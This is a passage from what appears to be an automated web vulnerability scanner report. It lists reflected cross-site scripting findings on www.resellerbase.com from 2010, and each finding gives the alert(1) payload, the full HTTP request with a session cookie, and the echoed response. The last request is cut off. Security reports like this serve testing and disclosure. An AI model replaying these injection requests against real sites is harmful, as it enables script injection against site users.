<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themescfc3e<img src=a onerror=alert(1)>b2069389d58/kosmos/images/rating/2half.gif]</td>
...[SNIP]...

2.4466. http://www.resellerbase.com/tag/themes/kosmos/images/rating/2half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e74ad<img%20src%3da%20onerror%3dalert(1)>5ae9c086f9c was submitted in the REST URL parameter 3. This input was echoed as e74ad<img src=a onerror=alert(1)>5ae9c086f9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmose74ad<img%20src%3da%20onerror%3dalert(1)>5ae9c086f9c/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmose74ad<img src=a onerror=alert(1)>5ae9c086f9c/images/rating/2half.gif]</td>
...[SNIP]...

2.4467. http://www.resellerbase.com/tag/themes/kosmos/images/rating/2half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 587da</title><img%20src%3da%20onerror%3dalert(1)>dd68a7a6ea2 was submitted in the REST URL parameter 3. This input was echoed as 587da</title><img src=a onerror=alert(1)>dd68a7a6ea2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos587da</title><img%20src%3da%20onerror%3dalert(1)>dd68a7a6ea2/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos587da</title><img src=a onerror=alert(1)>dd68a7a6ea2/images/rating/2half.gif</title>
...[SNIP]...

2.4468. http://www.resellerbase.com/tag/themes/kosmos/images/rating/2half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload 549fe</title><img%20src%3da%20onerror%3dalert(1)>d9a3d8099dc was submitted in the REST URL parameter 4. This input was echoed as 549fe</title><img src=a onerror=alert(1)>d9a3d8099dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images549fe</title><img%20src%3da%20onerror%3dalert(1)>d9a3d8099dc/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images549fe</title><img src=a onerror=alert(1)>d9a3d8099dc/rating/2half.gif</title>
...[SNIP]...

2.4469. http://www.resellerbase.com/tag/themes/kosmos/images/rating/2half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 30573<img%20src%3da%20onerror%3dalert(1)>c96462afd70 was submitted in the REST URL parameter 4. This input was echoed as 30573<img src=a onerror=alert(1)>c96462afd70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images30573<img%20src%3da%20onerror%3dalert(1)>c96462afd70/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images30573<img src=a onerror=alert(1)>c96462afd70/rating/2half.gif]</td>
...[SNIP]...

2.4470. http://www.resellerbase.com/tag/themes/kosmos/images/rating/2half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload f088b</title><img%20src%3da%20onerror%3dalert(1)>8a79d5525ab was submitted in the REST URL parameter 5. This input was echoed as f088b</title><img src=a onerror=alert(1)>8a79d5525ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/ratingf088b</title><img%20src%3da%20onerror%3dalert(1)>8a79d5525ab/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/ratingf088b</title><img src=a onerror=alert(1)>8a79d5525ab/2half.gif</title>
...[SNIP]...

2.4471. http://www.resellerbase.com/tag/themes/kosmos/images/rating/2half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c2beb<img%20src%3da%20onerror%3dalert(1)>42cbb0739f7 was submitted in the REST URL parameter 5. This input was echoed as c2beb<img src=a onerror=alert(1)>42cbb0739f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/ratingc2beb<img%20src%3da%20onerror%3dalert(1)>42cbb0739f7/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/ratingc2beb<img src=a onerror=alert(1)>42cbb0739f7/2half.gif]</td>
...[SNIP]...

2.4472. http://www.resellerbase.com/tag/themes/kosmos/images/rating/2half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload 37ebc</title><img%20src%3da%20onerror%3dalert(1)>3878883e8ee was submitted in the REST URL parameter 6. This input was echoed as 37ebc</title><img src=a onerror=alert(1)>3878883e8ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/2half.gif37ebc</title><img%20src%3da%20onerror%3dalert(1)>3878883e8ee HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating/2half.gif37ebc</title><img src=a onerror=alert(1)>3878883e8ee</title>
...[SNIP]...

2.4473. http://www.resellerbase.com/tag/themes/kosmos/images/rating/2half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload bc483<img%20src%3da%20onerror%3dalert(1)>16c5dba9175 was submitted in the REST URL parameter 6. This input was echoed as bc483<img src=a onerror=alert(1)>16c5dba9175 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/2half.gifbc483<img%20src%3da%20onerror%3dalert(1)>16c5dba9175 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating/2half.gifbc483<img src=a onerror=alert(1)>16c5dba9175]</td>
...[SNIP]...

2.4474. http://www.resellerbase.com/tag/themes/kosmos/images/rating/3half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e8f16<script>alert(1)</script>4ec26728f7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tage8f16<script>alert(1)</script>4ec26728f7d/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tage8f16<script>alert(1)</script>4ec26728f7d/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.4475. http://www.resellerbase.com/tag/themes/kosmos/images/rating/3half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload ecaf5</title><img%20src%3da%20onerror%3dalert(1)>3a0e3970892 was submitted in the REST URL parameter 2. This input was echoed as ecaf5</title><img src=a onerror=alert(1)>3a0e3970892 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themesecaf5</title><img%20src%3da%20onerror%3dalert(1)>3a0e3970892/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themesecaf5</title><img src=a onerror=alert(1)>3a0e3970892/kosmos/images/rating/3half.gif</title>
...[SNIP]...

2.4476. http://www.resellerbase.com/tag/themes/kosmos/images/rating/3half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 169aa<img%20src%3da%20onerror%3dalert(1)>cac0777d310 was submitted in the REST URL parameter 2. This input was echoed as 169aa<img src=a onerror=alert(1)>cac0777d310 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes169aa<img%20src%3da%20onerror%3dalert(1)>cac0777d310/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes169aa<img src=a onerror=alert(1)>cac0777d310/kosmos/images/rating/3half.gif]</td>
...[SNIP]...

2.4477. http://www.resellerbase.com/tag/themes/kosmos/images/rating/3half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 3dc6c</title><img%20src%3da%20onerror%3dalert(1)>a0aa919af9 was submitted in the REST URL parameter 3. This input was echoed as 3dc6c</title><img src=a onerror=alert(1)>a0aa919af9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos3dc6c</title><img%20src%3da%20onerror%3dalert(1)>a0aa919af9/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos3dc6c</title><img src=a onerror=alert(1)>a0aa919af9/images/rating/3half.gif</title>
...[SNIP]...

2.4478. http://www.resellerbase.com/tag/themes/kosmos/images/rating/3half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 58391<img%20src%3da%20onerror%3dalert(1)>cdba8b16790 was submitted in the REST URL parameter 3. This input was echoed as 58391<img src=a onerror=alert(1)>cdba8b16790 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos58391<img%20src%3da%20onerror%3dalert(1)>cdba8b16790/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos58391<img src=a onerror=alert(1)>cdba8b16790/images/rating/3half.gif]</td>
...[SNIP]...

2.4479. http://www.resellerbase.com/tag/themes/kosmos/images/rating/3half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e50b9<img%20src%3da%20onerror%3dalert(1)>38b4a24a89b was submitted in the REST URL parameter 4. This input was echoed as e50b9<img src=a onerror=alert(1)>38b4a24a89b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/imagese50b9<img%20src%3da%20onerror%3dalert(1)>38b4a24a89b/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/imagese50b9<img src=a onerror=alert(1)>38b4a24a89b/rating/3half.gif]</td>
...[SNIP]...

2.4480. http://www.resellerbase.com/tag/themes/kosmos/images/rating/3half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload f05bb</title><img%20src%3da%20onerror%3dalert(1)>6ac1571b7ac was submitted in the REST URL parameter 4. This input was echoed as f05bb</title><img src=a onerror=alert(1)>6ac1571b7ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/imagesf05bb</title><img%20src%3da%20onerror%3dalert(1)>6ac1571b7ac/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/imagesf05bb</title><img src=a onerror=alert(1)>6ac1571b7ac/rating/3half.gif</title>
...[SNIP]...

2.4481. http://www.resellerbase.com/tag/themes/kosmos/images/rating/3half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f6efa<img%20src%3da%20onerror%3dalert(1)>f54f768fb78 was submitted in the REST URL parameter 5. This input was echoed as f6efa<img src=a onerror=alert(1)>f54f768fb78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/ratingf6efa<img%20src%3da%20onerror%3dalert(1)>f54f768fb78/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/ratingf6efa<img src=a onerror=alert(1)>f54f768fb78/3half.gif]</td>
...[SNIP]...

2.4482. http://www.resellerbase.com/tag/themes/kosmos/images/rating/3half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload 1d7f8</title><img%20src%3da%20onerror%3dalert(1)>f1072a8c3c9 was submitted in the REST URL parameter 5. This input was echoed as 1d7f8</title><img src=a onerror=alert(1)>f1072a8c3c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating1d7f8</title><img%20src%3da%20onerror%3dalert(1)>f1072a8c3c9/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating1d7f8</title><img src=a onerror=alert(1)>f1072a8c3c9/3half.gif</title>
...[SNIP]...

2.4483. http://www.resellerbase.com/tag/themes/kosmos/images/rating/3half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d37a5<img%20src%3da%20onerror%3dalert(1)>687134f9e8d was submitted in the REST URL parameter 6. This input was echoed as d37a5<img src=a onerror=alert(1)>687134f9e8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/3half.gifd37a5<img%20src%3da%20onerror%3dalert(1)>687134f9e8d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
